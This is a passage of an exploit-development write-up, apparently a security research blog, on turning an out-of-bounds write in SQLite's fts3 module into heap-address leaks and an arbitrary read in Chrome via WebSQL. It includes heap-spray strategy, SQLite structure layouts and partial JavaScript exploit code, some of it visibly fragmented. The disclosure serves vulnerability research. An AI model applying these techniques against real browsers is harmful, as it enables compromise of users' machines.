/* ** The maximum length of a single SQL statement in bytes. ** ** It used to be the case that setting this value to zero would ** turn the limit off. That is no longer true. It is not possible ** to turn this limit off. */ #ifndef SQLITE_MAX_SQL_LENGTH # define SQLITE_MAX_SQL_LENGTH 1000000000 #endif
1000000000 is a very big value. It is almost 1GB. What this means is that theoretically, it is possible to create column names that are approximately 1GB, and make them persist in memory. Before discussing what we’re going to do with the Column values, let’s look at the structures of the objects involved on column name creation, and the code that handles them.
When a table is created by the CREATE statement, the tokenizer would tokenize the entire SQL query, and pass the tokens to the parser. Under the hood, SQLite uses the Lemon Parser Generator. Lemon is similar to the more popular YACC or BISON parsers, but has a different grammar and is maintained by SQLite. The Lemon parser generator will parse context-free code that is written in Lemon grammar syntax, and generates an LALR parser in C code. In SQLite, the bulk of the generated C code can be found in the yy_reduce function. The actual context-free code that Lemon parses is found in parse.y, and the code that is used for CREATE statements is found here. A snippet of the code is shown below.
The bulk of the Table creation logic is performed in the sqlite3StartTable function, and the Column handling logic is found in sqlite3AddColumn. Let’s visit the sqlite3StartTable function and take a brief look.
void sqlite3StartTable(
Parse *pParse, /* Parser context */
Token *pName1, /* First part of the name of the table or view */
Token *pName2, /* Second part of the name of the table or view */ int isTemp, /* True if this is a TEMP table */ int isView, /* True if this is a VIEW */ int isVirtual, /* True if this is a VIRTUAL table */ int noErr /* Do nothing if table already exists */ ){ Table *pTable; char*zName =0;/* The name of the new table */
sqlite3 *db = pParse->db;
Vdbe *v; int iDb;/* Database number to create the table in */
Token *pName;/* Unqualified name of the table to create */
The most important object for our purposes is the Table object. This structure contains every information of the table created by the CREATE statement, and the definition is as follows.
struct Table { char*zName;/* Name of the table or view */ Column *aCol;/* Information about each column */ Index *pIndex;/* List of SQL indexes on this table. */
Select *pSelect;/* NULL for tables. Points to definition if a view. */
FKey *pFKey;/* Linked list of all foreign keys in this table */ char*zColAff;/* String defining the affinity of each column */
ExprList *pCheck;/* All CHECK constraints */ /* ... also used as column name list in a VIEW */ int tnum;/* Root BTree page for this table */
u32 nTabRef;/* Number of pointers to this Table */
u32 tabFlags;/* Mask of TF_* values */
i16 iPKey;/* If not negative, use aCol[iPKey] as the rowid */ i16 nCol;/* Number of columns in this table */ LogEst nRowLogEst;/* Estimated rows in table - from sqlite_stat1 table */
LogEst szTabRow;/* Estimated size of each table row in bytes */
u8 keyConf;/* What to do in case of uniqueness conflict on iPKey */ int addColOffset;/* Offset in CREATE TABLE stmt to add a new column */ int nModuleArg;/* Number of arguments to the module */ char**azModuleArg;/* 0: module 1: schema 2: vtab name 3...: args */
VTable *pVTable;/* List of VTable objects. */
Trigger *pTrigger;/* List of triggers stored in pSchema */
Schema *pSchema;/* Schema that contains this table */
Table *pNextZombie;/* Next on the Parse.pZombieTab list */ };
For our purposes, the most important fields is aCol and nCol. Next, we will look at the sqlite3AddColumn function.
if( pType->n==0){ /* If there is no type specified, columns have the default affinity ** 'BLOB' with a default size of 4 bytes. */
pCol->affinity = SQLITE_AFF_BLOB;
pCol->szEst =1; #ifdef SQLITE_ENABLE_SORTER_REFERENCES if(4>=sqlite3GlobalConfig.szSorterRef){
pCol->colFlags |= COLFLAG_SORTERREF; } #endif }else{
zType = z + sqlite3Strlen30(z)+1; memcpy(zType, pType->z, pType->n);
zType[pType->n]=0;
sqlite3Dequote(zType); pCol->affinity = sqlite3AffinityType(zType, pCol); pCol->colFlags |= COLFLAG_HASTYPE; } p->nCol++; pParse->constraintName.n=0; }
The important parts of the logic are highlighted. Several things can be observed from this function. First, as mentioned above, there is no limit on the length of the column name. However, there is a limit of how many columns can exist on a single table, and that value is defined by db->aLimit[SQLITE_LIMIT_COLUMN]. The value comes from a #define value in the SQLite source code, and is set to 2000.
/*
** This is the maximum number of
**
** * Columns in a table
** * Columns in an index
** * Columns in a view
** * Terms in the SET clause of an UPDATE statement
** * Terms in the result set of a SELECT statement
** * Terms in the GROUP BY or ORDER BY clauses of a SELECT statement.
** * Terms in the VALUES clause of an INSERT statement
**
** The hard upper limit here is 32676. Most database people will
** tell you that in a well-normalized database, you usually should
** not have more than a dozen or so columns in any table. And if
** that is the case, there is no point in having more than a few
** dozen values in any of the other situations described above.
*/ #ifndef SQLITE_MAX_COLUMN # define SQLITE_MAX_COLUMN 2000 #endif
This is something to keep in mind for later.
Also, column names can not be duplicate. Next, the column properties are stored in an array of Column objects, which tableObject->aCol points to. This array grows by every 8 new columns, which can be seen in line 26. This function also sets various flags of the Column object. The definition of the Column structure is as follows.
1 2 3 4 5 6 7 8 9 10 11 12 13
/*
** information about each column of an SQL table is held in an instance
** of this structure.
*/ struct Column { char*zName;/* Name of this column, \000, then the type */
Expr *pDflt;/* Default value of this column */ char*zColl;/* Collating sequence. If NULL, use the default */
u8 notNull;/* An OE_ code for handling a NOT NULL constraint */ char affinity;/* One of the SQLITE_AFF_... values */
u8 szEst;/* Estimated size of value in this column. sizeof(INT)==1 */
u8 colFlags;/* Boolean properties. See COLFLAG_ defines below */ };
The actual column name will be held in zName, and there are various other fields that describe the characteristics of a column.
One last thing that should be mentioned is that these functions are called in the parser phase of the SQLite execution pipeline. This means that the only heap noise present is the noise from the tokenizer phase. However, the tokenizer creates almost zero heap noise and therefore, the objects created on the heap as well as the heap activity that occurs during a CREATE TABLE statements is quite manageable.
The following is how an actual Table object and the accompanying Column array would look in memory.
The important thing to notice about these table objects is that they are used for every operation on the table, be it a SELECT, UPDATE, or INSERT statement. Every field in a user query that references things in a certain table, will be checked against this table object that resides in memory. What this means in an exploitation view is that, if it is possible to corrupt certain fields in these objects, we can make SQLite react in peculiar ways when certain SQL queries are issued. Take the column name above as an example. If we could corrupt the name t1 and change it to t1337, and afterwards if the attacker executes the SQL statement “SELECT t1 from test”, the SQLite engine will respond as “No such column as t1 exists”. This is because when the select statement is executed, the SQLite engine will consult the above table and look at the aCol field, and sequentially test if there exists a column which matches the name t1. If it doesn’t find such column, then it returns an error.
Knowing this, and the other elements discussed above, a plan of attack emerges.
Spray a whole bunch of Column arrays, as many to fill more than 2GB’s of memory.
Place the vulnerable apple fts3 allocation in front of the spray.
Trigger the vulnerability, and corrupt one of the column object’s zName field.
Corrupt the field so that it points to an address that we want to leak.
Afterwards, try to leak the value through SQL statements.
There are several caveats with this approach. The problems are not immediately clear until actually constructing the payload and viewing the results, so we will address them as they appear, one by one.
The first problem is that, the maximum number of columns in SQLite is 2000. A single column object’s size is 0x20. This means that the maximum size of a Column array is 0xFA00. In order to spray 2GB worth of memory, 0x8000 Tables with 2000 columns have to be sprayed. 0x8000 doesn’t seem like a big number for SQLite to handle, but when actually spraying that amount of column arrays, the time elapsed from beginning to completion is 10 minutes. This is a lot of time. It was desired to reduce that time to something more manageable.
To address this problem, we used a divide-and-conquer approach. How it works is as follows.
Create a table with a 256MB length column name. Create 8 tables of such kind. This will spray 2GB worth of data.
Place the vulnerable apple fts3 allocation in front of the spray.
Trigger the bug. The OOB write will overwrite exactly 4 bytes of the column name of one of the 8 tables.
Query all 8 tables with “SELECT 256MB_really_long_column_name from tableN”. Exactly 1 table will return an error that no such column exists.
A picture is worth a thousand words. The entire process is illustrated below.
When testing this the first time on Chrome, we realized that it actually works. So we decided to build all kinds of different primitives based on this concept.
Another problem became immediately clear when executing this first experiment several times. That is, the random location of apple. After the first successful corruption, upon the next corruption, the allocation of apple would jump to a completely different place from the previous allocation. This was strongly undesirable. In order to place an object of interest in the OOB write address, that OOB write location needed to stay in a fixed position, instead of jumping all around the place which makes it impossible to build other primitives on. The reason apple kept on moving was because it was allocated based on the 0x10 size-class’s freelist of the thread cache. It is highly likely that heap noise that places a lot of 0x10 chunks on the freelist was the source of uncertainty. In order to understand the actual source of the noise, let’s look at the stack trace of when the bug triggers.
1 2 3 4 5 6 7 8 9 10 11 12
Breakpoint 2, fts3SegReaderNext(p=0x74b378, pReader=0x74b988, bIncr=0) at sqlite3.c:168731 168731 if( !pReader->aDoclist ){ (gdb) bt #0fts3SegReaderNext(p=0x74b378, pReader=0x74b988, bIncr=0) at sqlite3.c:168731 #10x00000000004e414a in fts3SegReaderStart(p=0x74b378, pCsr=0x74dbf8, zTerm=0x751128"sample", nTerm=6) at sqlite3.c:170143 #20x00000000004e427a in sqlite3Fts3MsrIncrStart(p=0x74b378, pCsr=0x74dbf8, iCol=1, zTerm=0x751128"sample", nTerm=6) at sqlite3.c:170183 #30x00000000004d7699 in fts3EvalPhraseStart(pCsr=0x753fe8, bOptOk=1, p=0x7510a8) at sqlite3.c:161648 #40x00000000004d8356 in fts3EvalStartReaders(pCsr=0x753fe8, pExpr=0x751068, pRc=0x7fffffffbe68) at sqlite3.c:162034 #50x00000000004d8c62 in fts3EvalStart(pCsr=0x753fe8) at sqlite3.c:162362 #60x00000000004d5ed1 in fts3FilterMethod(pCursor=0x753fe8, idxNum=3, idxStr=0x0, nVal=1, apVal=0x745540) at sqlite3.c:160604 #70x0000000000465aca in sqlite3VdbeExec(p=0x73f428) at sqlite3.c:89599 #80x000000000045a1cb in sqlite3Step(p=0x73f428) at sqlite3.c:81040
In line 11, it can be observed that the Virtual Table Method fts3FilterMethod is executed from the Virtual Data Base Engine. What this means is that the SELECT statements were tokenized, parsed, bytecode generated, and bytecode executed. It is easy to imagine how much unwanted heap allocations would occur throughout that entire phase of execution.
Generally, there are 2 ways to deal with heap noise.
Precisely track every single heap allocation that occurs when the bug triggers, and make the exploit compatible with all the heap noise.
Upgrade the heap objects that are used during exploitation to a size-class that is not busy, where almost no heap noise occurs in that size-class.
Method 1 is definitely possible, and have been successful in some of the past engagements. However, whenever method 2 is applicable, it is the desirable method and the one that is always chosen to overcome the situation. To address the heap noise, we went with method 2, because the size of the apple allocation is completely attacker controlled.
Now it is time to refine the strategy.
The size of apple should be upgraded to something bigger than 0x800. Let’s say, 0xa00.
0xa00 sized chunks will be sprayed. One of the 0xa00 chunks will be a placeholder to be used with the apple fts3 allocation.
Create a table with a 256MB length column name. Create 8 tables of such kind. This will spray 2GB worth of data.
Create a hole in the placeholder in step2. This will place it on the top of the 0xa00 freelist.
Allocate the 0xa00 sized apple fts3 allocation in the placeholder. Trigger the bug. The OOB write will overwrite exactly 4 bytes of the column name of one of the 8 tables.
Plug in the placeholder hole with a new 0xa00 allocation, so it could be reused for corruption in a later phase.
Query all 8 tables with “SELECT 256MB_really_long_column_name from tableN”. Exactly 1 table will return an error that no such column exists.
The entire process is illustrated below.
This strategy makes it possible to corrupt the same address over and over again with different content on each corruption attempt. It is imperative for the OOB write to work repeatedly and reliably no matter how many times it was executed, in order to to move forwards to the next stages of exploitation. While experimenting with this strategy, it came to realization that the OOB write would not be reliable when the bug trigger SQL statements were coupled with other SQL statements, such as the heap spray statements. However, when the bug trigger SQL statements were detached into a single transaction and was executed separately from any other statements, it work reliably. Even when the primitive was executed 0x1000 times, not a single attempt had apple stray away from the placeholder, and all attempts succeeded with the OOB writing at the same address in all attempts.
One thing to note is how the heap manipulating primitives are constructed. To spray the heap with a controlled size and controlled content chunk, a table is created with a single column, and the column name will be the sprayed content. To create holes, the table will be dropped, and the attached column name will be deallocated from the heap. This creates a perfect primitive to create chunks and free them, in a completely controlled manner.
Another thing worth mentioning is the discrepancy of where the chunks are operating. For instance, the hole creating primitive would free the column name on the parser phase. The stage where the fts table’s term apple is allocated, is during the execution of the Bytecode Engine. There will be a lot of noise in-between where the chunk is freed, and when apple refills it. However, in order to minimize the noise, we’ve upgraded the apple chunk to a 0xa00 size class. Also, as luck has it, the hole created during DROP TABLE remains on the top of the freelist, all the way until apple comes along to pick it back up. This is not always the case as will be seen in the later stages of exploitation, but the DROP TABLE and apple allocation make a perfect pair for the free/refill.
The entire strategy described above would look something like this in javascript.
function create_oob_string(chunk_size, memcpy_offset, payload){
let target_chunk;
let chunk_size_adjusted;
if(chunk_size < 0x1000)
chunk_size_adjusted = chunk_size - 0x10; else
chunk_size_adjusted = chunk_size - 0x100;
chunk_size_adjusted /=2;// To account for the *2 on realloc
target_chunk ='A'.hexEncode().repeat(chunk_size_adjusted);
let payload_hex = payload.hexEncode();
let oob_string = `X'00${create_var_int(chunk_size_adjusted)}${target_chunk}03010200${create_var_int(memcpy_offset)}${create_var_int(payload.length)}${payload_hex}03010200'`;
return oob_string; }
function create_var_int(number){
let varint ='';
let length =0;
let current_number = number;
while(current_number !=0){
let mask = 0x80;
let shifted_number = current_number >>7;
statements.push("CREATE TABLE debug_table(AAA)");
statements.push("CREATE VIRTUAL TABLE ft USING fts3");
statements.push("INSERT INTO ft VALUES('dummy')");
function sploit2(){
let statements =[];
let found_flag =0;
let oob_string = create_oob_string(oob_chunk_size, 0x7FFFFFFF,"ZZZZ");
console.log('Stage2 Start!');
statements.push(`UPDATE ft_segdir SET root = ${oob_string}`);
statements.push(`DROP TABLE test${saved_index}`);
statements.push(`SELECT * FROM ft WHERE ft MATCH 'test'`);
saved_index = spray(statements, oob_chunk_size,1,"A");
function ping_column(current_index){
let statement = `SELECT ${"A".repeat(0x10000000 - 0x100)}_0 FROM test${current_index}`;
db.transaction((tx)=>{
tx.executeSql(
statement,[], function(sqlTransaction, sqlResultSet){
console.log('success!!!');
console.log(`test index : ${current_index}`) if(current_index == big_boy_spray_count-1){
found_flag =-1; } }, function(sqlTransaction, sqlError){
console.log('fail!!!');
console.log(`test index : ${current_index}`)
found_flag =1; } ); },
dbErr, function(){ if(found_flag ==0){
ping_column(current_index +1); } elseif(found_flag ==1){
let corrupted_index = current_index;
console.log(`corrupted index : ${corrupted_index}`);
sploit3_1(corrupted_index); } else{
console.log(`Stage1 : The column name didn't get corrupted. Something's wrong...?`); } } ); }
In the previous stage, it was mentioned that a divide-and-conquer approach was used. The first stage would spray gigantic 256MB heap chunks, which is 0x10000000 in size. The next stage would scale it down with a factor of 0x10, and do the same thing that the previous stage did with 16MB, or 0x1000000 sized chunks. The following illustration describes the entire process.
It’s easy to see where this is going. On stage 4, the same thing is going to happen, but instead this time 0x100000 sized chunks will be sprayed. On stage 5 0x10000. Stage 6 is 0x1000. All of this is to scale down the target chunks until it reaches the size 0x1000. The reason behind this is because column object arrays can only grow up to 0xFA00 in size, as mentioned above. Also, for every 8 new columns, the column array would be realloc’d making the column array jump all around the place, so in order to make the problem more simpler, 0x1000 was chosen instead of 0x10000. 0x1000 is a big enough size to be void of most of the heap noise.
Before proceeding to the next stage, it is worth discussing sources of failures on this part of the stage. First, all chunks bigger than 0x8000 come from the Central Cache. What this means is that, there is an opportunity that other threads can snatch the pages from the Central Cache, before the WebSQL Database thread has a chance to grab them. Fortunately, this doesn’t happen very often. If it does become a problem though, there is a way to get rid of it. The first thing is to track down the problematic allocation, and figure out what size class it is. Next, we would deliberately allocate and free a chunk that matches the size of the problematic chunk, in a way that it doesn’t get coalesced by adjacent chunks. This will place that free’d chunk on the Central class’s freelist, and when the time comes and the rogue allocation takes place, the problematic thread that requested the problematic allocation will snatch that chunk from the freelist, leaving the other chunks alone. This problem actually applies to all stages. However, this kind of problem occurs very rarely.
The more frequently occurring problem is that of allocations of unintended objects. For instance, all of our heap feng-shui resolves around column names. However, in order to create column names, we have to create a table. When tables are created, lots of objects are allocated on the heap such as the table object, expression trees, column affinity arrays, the table name string, and the like. These will be allocated for every table that is created, so the more tables that are created, the more likely it is that those object’s will exhaust their respective size class’s freelist, and request new chunks from the central cache. When the central cache’s freelist is also exhausted, it will start to steal pages that are reserved for large chunks. Those pages will include the holes that we wanted to refill, such as Table6‘s hole in the above illustration. This is a very possible situation, and when the exploit fails in the first couple of stages, most of the time this is the reason behind the failure. To fix this, it is required to create a really long freelist for all the unintended objects that are allocated upon table creation, and make those unintended objects take chunks from that long freelist. This is kind of complicated in terms of TCMalloc, because there is a maximum size on the thread cache’s freelist and if the program reaches that limit, then the Central Cache will keep stealing some of the chunks from the thread cache’s freelist. This maximum limit will be dynamically increased as TCMalloc sees a lot of heap activity on that chunk size-class’s freelist, but in order to take full advantage of it, it is required to have a deep understanding of the dynamic nature of freelists, and study on how it can be controlled.
A more better way to fix this issue would have been to create one gigantic table with 2000 columns, where all columns would act as a spray. In order to create holes, an SQL statement would be issued to change column names into a different name, which would free the previous column name. SQLite actually provides a way to do this, but unfortunately the version of SQLite that Google used at the time the vulnerability existed is 3.24.0, and hence, that functionality was not implemented yet in Chrome’s SQLite.
The actual best way to deal with this is to pre-create all tables that will be used in the entire exploit, and whenever the need arises to spray column names, it is possible to do so with the ALTER TABLE ADD COLUMN statement. The exploit does not specifically address this issue, and should be re-run if it fails during this stage.
After all the spraying and corrupting, this entire process until stage 6 takes a little over 1 minute in a virtual machine. This is a lot more manageable than 10 minutes. However, 1 minute is still too long to be used in the real world. As the purpose was to create a Proof-of-Concept, the exploit was not improved to further to shave off some more time, due to time constraints. Nevertheless, we will discuss on ideas of how to eliminate most of the spraying time in the end of the blog post.
Now that everything has been covered, we can proceed to Stage 7.
Stage 7
Stage 7’s has only one purpose. Place a 0x1000 sized Column Object Array into the corrupted 0x1000 chunk, and find out which of the column objects inside the array is the one that gets corrupted. This is illustrated below.
After this, it is possible to know which of the 104 columns were corrupted. We can keep that corrupted column index bookmarked, and use it to probe the result of all future corruption attempts.
There is a catch here though. What if the corruption happens after the 104 columns, in one of the columns in the range 104 ~ 128? Since no Column object exists in that range, it would be impossible to know which part of the column object array is corrupted. To fix this, when the exploit determines that the OOB write falls into that specific range, it uses a different apple for the OOB write. Specifically, it uses the apple that’s right in front of the current apple.
By using the apple slot that is 0xa00 before the current apple, The corruption falls back into the 0 ~ 104 range, and Stage 7 can be run again to retrieve the corrupted column. This might fail sometimes, and the previous apple block is actually at a completely random position. When this fails, the exploit should go back to the previous stages and find out which of the other huge blocks of column got corrupted, and then work forwards from there. This is not particularly implemented in the exploit and the exploit should be run again if it fails during this stage.
Before going to the next stage, Stage 7 uses the OOB write to completely wipe out the Column Name address field to 0. The reason is because when the table is dropped, SQLite will go through all the column objects in the array, and issue tc_free(column_name_address) to all of the objects. If the address fed to tc_free is not an address that was returned from a previous tc_malloc, then the program will crash. Wiping it to 0 will make it call tc_free(0), which is essentially a no-op.
Now that we know which column index was corrupted, we can now proceed to Stage 8.
Stage 8
This is the most fragile part of the exploit.
The first thing that Stage 8 tries to achieve, is to drop 3 of the 0x1000 chunks starting from the corrupted one, and fill them back in with controlled chunks. It relies on the fact that when the 0x1000 chunks were sprayed at Stage 6, they were all allocated consecutively, back-to-back from each other. In reality, this is not always the case. Sometimes the 0x1000 will be allocated sequentially, and then at some point the next allocation suddenly jumps to a random location. This happens a lot frequently on small chunks, and it happens rarely in large chunks. The exploit could have been adapted to work on large chunks, but in the current exploitation strategy, the 3 chunks had to include the 104 column object array and place it in the first chunk. The reason behind this is because there must exist a way to place attacker controlled arbitrary data on the heap. In the course of exploiting the bug, such primitive was not used. This is because column names, or in fact, all names that are included in an SQL query is first converted into UTF-8 format before it is stored in memory or the database. To go around that, we use the OOB write itself to write arbitrary payload on memory. This requires everything to be behind the 104 column array, so the address of the arbitrary data can actually be retrieved and used throughout the exploit. All of this will become clear in Stage 9. We will also discuss how to remove this requirement in Stage 10. We were not particularly happy with the instability in this stage, but we just moved forward because the purpose was to prove exploitability. For now, we’ll just assume that the 3 chunks will succeed in being allocated next to each other.
Now we should discuss what kind of 3 chunks are going to be placed.
The first chunk will hold a table of 104 columns. But this time, the corrupted column will point to a column name that is 0x1000 in size. This column name will be filled with B’s.
The second chunk will be that column name, filled with B’s.
The third chunk will be an Fts3Table object.
This sounds easy on text, but the layout of the first two chunks are more complicated than it sounds. Since those two chunks are created in a single CREATE TABLE query, the freelist has to be constructed carefully, so that the two allocations will be placed in that exact order. To make things even more complicated, the freelist will be scrambled depending on which column index was corrupted. Therefore, the freelist must be massaged in different ways, for different column indexes. The way this was solved was to deliberately create holes, deliberately plugging existing holes in different positions in the freelist, changing the order of allocation/free, and adding garbage columns just to compensate for unwanted holes in the freelist. This had to be tested for every index in the column array, and was a tedious process. The end result kind of looks like this.
// Just for good measure. In case there are any holes left behind
ft3_spray(statements, 0xD80,"AAAA");
ft3_spray(statements, 0xD80,"AAAA");
ft3_spray(statements, 0xD80,"AAAA");
ft3_spray(statements, 0xD80,"AAAA");
runAll(statements,(event)=>{
sploit8_2(); }); }
There could be a better way to do this, but this was how it was done. The alternative exploitation strategy discussed in Stage 10 will remove the need for this laborious task, so future versions of the exploit should use that strategy instead. Now chunk 1 and chunk 2 is covered. Chunk 3 introduces a new object called Fts3Table. This is an object that is created during the execution of a CREATE VIRTUAL TABLE fts3() query. Let’s take a glimpse of the function that is responsible of creating that object.
/* Fill in the azColumn array */ for(iCol=0; iCol<nCol; iCol++){ char*z; int n =0; z =(char*)sqlite3Fts3NextToken(aCol[iCol], &n); if( n>0){ memcpy(zCsr, z, n); } zCsr[n]='\0'; sqlite3Fts3Dequote(zCsr); p->azColumn[iCol]= zCsr; zCsr += n+1; assert( zCsr <=&((char*)p)[nByte]); }
// snipped for brevity }
/* ** A connection to a fulltext index is an instance of the following ** structure. The xCreate and xConnect methods create an instance ** of this structure and xDestroy and xDisconnect free that instance. ** All other methods receive a pointer to the structure as one of their ** arguments. */ struct Fts3Table { sqlite3_vtab base;/* Base class used by SQLite core */ sqlite3 *db;/* The database connection */ constchar*zDb;/* logical database name */ constchar*zName;/* virtual table name */ int nColumn;/* number of named columns in virtual table */ char**azColumn;/* column names. malloced */ u8 *abNotindexed;/* True for 'notindexed' columns */
sqlite3_tokenizer *pTokenizer;/* tokenizer for inserts and queries */ char*zContentTbl;/* content=xxx option, or NULL */ char*zLanguageid;/* languageid=xxx option, or NULL */ int nAutoincrmerge;/* Value configured by 'automerge' */
u32 nLeafAdd;/* Number of leaf blocks added this trans */
/* Precompiled statements used by the implementation. Each of these ** statements is run and reset within a single virtual table API call. */
sqlite3_stmt *aStmt[40];
sqlite3_stmt *pSeekStmt;/* Cache for fts3CursorSeekStmt() */
char*zReadExprlist; char*zWriteExprlist;
int nNodeSize;/* Soft limit for node size */
u8 bFts4;/* True for FTS4, false for FTS3 */
u8 bHasStat;/* True if %_stat table exists (2==unknown) */
u8 bHasDocsize;/* True if %_docsize table exists */
u8 bDescIdx;/* True if doclists are in reverse order */
u8 bIgnoreSavepoint;/* True to ignore xSavepoint invocations */ int nPgsz;/* Page size for host database */ char*zSegmentsTbl;/* Name of %_segments table */
sqlite3_blob *pSegments;/* Blob handle open on %_segments table */
int nIndex;/* Size of aIndex[] */ struct Fts3Index { int nPrefix;/* Prefix length (0 for main terms index) */
Fts3Hash hPending;/* Pending terms table for this index */ }*aIndex; int nMaxPendingData;/* Max pending data before flush to disk */ int nPendingData;/* Current bytes of pending data */
sqlite_int64 iPrevDocid;/* Docid of most recently inserted document */ int iPrevLangid;/* Langid of recently inserted document */ int bPrevDelete;/* True if last operation was a delete */ };
struct sqlite3_vtab { const sqlite3_module *pModule;/* The module for this virtual table */ int nRef;/* Number of open cursors */ char*zErrMsg;/* Error message from sqlite3_mprintf() */ /* Virtual table implementations will typically add additional fields */ };
There are several things noteworthy in this function. First, the Fts3Table object is dynamically sized. It is sized to encompass all of the column names, which gets stored in the object itself. Because column names are user controlled, the entire size of the Fts3Table is user controlled. This means that we can place an Fts3Table chunk into an arbitrary size-class freelist of our choosing. Next, there is a member, azColumn which points somewhere inside the object itself. If this value can be leaked, it can be used to calculate the object’s address. Next, there is a member called base. This base member is a struct, which has another member called pModule. This pModule member points within the .data section of the SQLite library. By leaking this address, it is possible to bypass ASLR. Finally, there is member called db. This points to an sqlite3 object, which is allocated when the WebSQL database is first opened. This occurs very early in the stage of exploitation, so we can expect that this object will be somewhere in the beginning of the heap. All of these object fields will be utilized later on during exploitation.
For now, we just want this Fts3Table object to be allocated as the third chunk. As mentioned above, since the column name actually goes into the Fts3table object, the size is completely controlled so we can make it use the 0x1000 size freelist. However, there is one thing to keep in mind. That is, before this chunk is created, a Table object is also created (because an fts3 table is also just a regular table) before the Fts3Table object is created. What this means is that the column name will actually be stored in 2 places. This will create 2 0x1000 chunks, which is undesirable. To get around this issue, we need the column name of the Table object to use a freelist other than the 0x1000 freelist. The boundary of a chunk being placed in a 0x1000 freelist is 0xD00. Any chunk smaller than that will be placed in the 0xD00 freelist. Therefore, we can create an fts3 table with a column that is smaller than 0xD00, and that column name will be take a chunk from the 0xD00 freelist. On the other hand, the combined size of the Fts3Table object calculated above in line 53 would be bigger than 0xD00, making it grab a chunk from the 0x1000 freelist. Problem solved. Now the Fts3Table object can be nicely placed in the third chunk.
The following illustration is what happens next in Stage 8.
Now we know the 1st, 2nd, and 3rd byte of the second chunk’s address. We will not bruteforce the 4th byte just yet, because there is a risk of hitting unmapped memory when bruteforcing it without knowing the byte’s range. Instead, we will proceed to leak the 5th, and 6th byte in Stage 9.
Stage 9
There are a total of 8 bytes that constitute an address, but for the purpose of leaking, we only need to leak 6 of them. This is because the heap grows upwards from the lowest address, and the heap would have to grow several hundred gigabytes in order to make the 7th byte of the address flip from 0 to 1. In stage 9, the 5th and 6th byte will be leaked one at a time. The way it is leaked is different from Stage 8. This time, it is not possible to bruteforce the byte, because setting the byte to an arbitrary value will make SQLite hit unmapped memory when it tries to access the column name. Therefore, the bytes have to be exactly leaked, using a different method. This is made possible by actually reading out the bytes as column names.
This was actually not possible until the 3 bytes of the second chunk were leaked in Stage 8. Armed with knowledge of the 3 bytes, we can cook up this kind of scenario.
There are a couple things to mention before progressing. First, it was surprising that SQLite would accept everything as a column name, including spaces, newlines, and special characters. All that was needed to make it work was to surround the entire column name with quotes. However, checking the existence of the column is not as simple as issuing a SELECT statement. For some reason, the tokenizer that handles the SELECT statement would eat all the column names between the quotes, and treat it like an *. Testing other different queries, we came across INSERT. By surrounding the column name with a parenthesis and quotes, it was possible to test if certain column names existed, even if the column name included whitespaces and special characters.
All of this seems perfect, and it also gives rise to another question. Why not just leak all bytes using this method? Unfortunately, things are slightly more complicated.
The biggest problem with this method is, that it is only possible to leak bytes that fall into the ascii range. In the above illustration, the 6th byte is okay and will be leaked without issues. However, the 5th byte falls outside the ASCII range, and will not be leaked. The reason for this is that when we issue an SQL statement, if there are any characters in a column name above the \x80 range, then SQLite will treat the characters as Unicode and internally convert them to UTF-8. It is the converted UTF-8 values that will be memcmp’d byte by byte with what the column name that resides in memory. For instance, if we ping for a column “\xC0”, then SQLite will convert that into UTF-8 form “\xC3\x80”, and “\xC3\x80” will be compared to what lies in memory. Only if the two matches, then SQLite will deem that the column exists. This brings up a serious problem where bytes can be leaked with an only a 50% success rate. However, as luck would have it, the 6th byte is always within the ASCII range. This is because as explained earlier, it would take several dozen GB’s of spray to make the 6th byte flip above 0x80. Therefore, there is no issue with the 6th byte. The problem is the 5th byte.
It would be sad to say that we would have to live with the 5th byte issue, and pray to god that it falls within that range. However, all things can be fixed. The following illustrates how to fix this issue.
Technically, the memcpy isn’t actually copying backwards. It’s just starting from a lower offset than 0x7FFFFFFF, such as 0x7FFFFFF0, and then copying all the way up to 0x80000000.
With this, it is possible to leak almost any byte, by constructing a unicode lookup table. Constructing this table requires quite some time and effort, so it was not specifically implemented in the exploit, but this would be the right way to correct this issue. Also, since the unicode library used by SQLite does not do a 1-on-1 matching on all Unicode characters, but rather translates them programatically, there could be cool ways to abuse the Unicode engine to produce a sequence of bytes that could be looked up easily, without having to construct a full blown table. This is left as an exercise for the interested reader. In the exploit, it tests the 5th byte and if it falls outside the ASCII range, it prints that the exploit should be run again by fully closing chrome and reopening it, to get a better 5th byte value.
After this stage, the exploit can finally start bruteforcing the 4th byte.
Based on the values that were leaked from the topmost bytes, the exploit runs a series of heuristics to guess the start value for bruteforcing, so that it falls within a mapped region, as well as making sure that the value is lower than the actual byte to be leaked. The actual heuristics would look as follows.
if(fts3_azColumn_leaked_byte_count >=3){
console.log(`Truncate it on purpose. We're still gonna brute the 4th byte because we don't know whether the leaked 4th byte is case insensitive and hence, inaccurate`);
This would handle all cases. Afterwards, the same logic in Stage 8 is applied to bruteforce the 4th byte. Now all 6 bytes of the address have been leaked. It’s time to proceed to Stage 10 and create an AAR.
Stage 10
If we can’t leak exact values from column names because of the unicode restriction, then how is it possible to create an AAR?
For this, we are going to use another field in the Column object that hasn’t been covered in detail, which is the Default Value. It is possible to set a default value using the following SQL statement.
As a reminder, the following is the definition of the Column object.
1 2 3 4 5 6 7 8 9 10 11 12 13
/* ** information about each column of an SQL table is held in an instance ** of this structure. */ struct Column { char*zName;/* Name of this column, \000, then the type */ Expr *pDflt;/* Default value of this column */ char*zColl;/* Collating sequence. If NULL, use the default */
u8 notNull;/* An OE_ code for handling a NOT NULL constraint */ char affinity;/* One of the SQLITE_AFF_... values */
u8 szEst;/* Estimated size of value in this column. sizeof(INT)==1 */
u8 colFlags;/* Boolean properties. See COLFLAG_ defines below */ };
These Default Values get stored in pDflt field of the Column object. They are not just stored as a stream of bytes, but they are stored in what SQLite calls an Expression Tree. Expressions represent part of the SQL statement, usually the part in the end such as the WHERE clause. This is the part of an SQL query which is user configurable, where the user could add different kinds of keywords and statements so that the SQL query would react differently based on the entire statement. The entire expression is represented as a tree, so SQLite can process it in a recursive manner. The default value specified in the end of the CREATE TABLE statement is also treated as part of the expression, and is stored within the tree. Let’s look at the definition of the Expr structure.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19
struct Expr {
u8 op;/* Operation performed by this node */ char affinity;/* The affinity of the column or 0 if not a column */
u32 flags;/* Various flags. EP_* See below */ union{ char*zToken;/* Token value. Zero terminated and dequoted */ int iValue;/* Non-negative integer value if EP_IntValue */ } u;
/* If the EP_TokenOnly flag is set in the Expr.flags mask, then no
** space is allocated for the fields below this point. An attempt to
** access them will result in a segfault or malfunction.
*********************************************************************/
Expr *pLeft;/* Left subnode */
Expr *pRight;/* Right subnode */
//snipped for brevity }
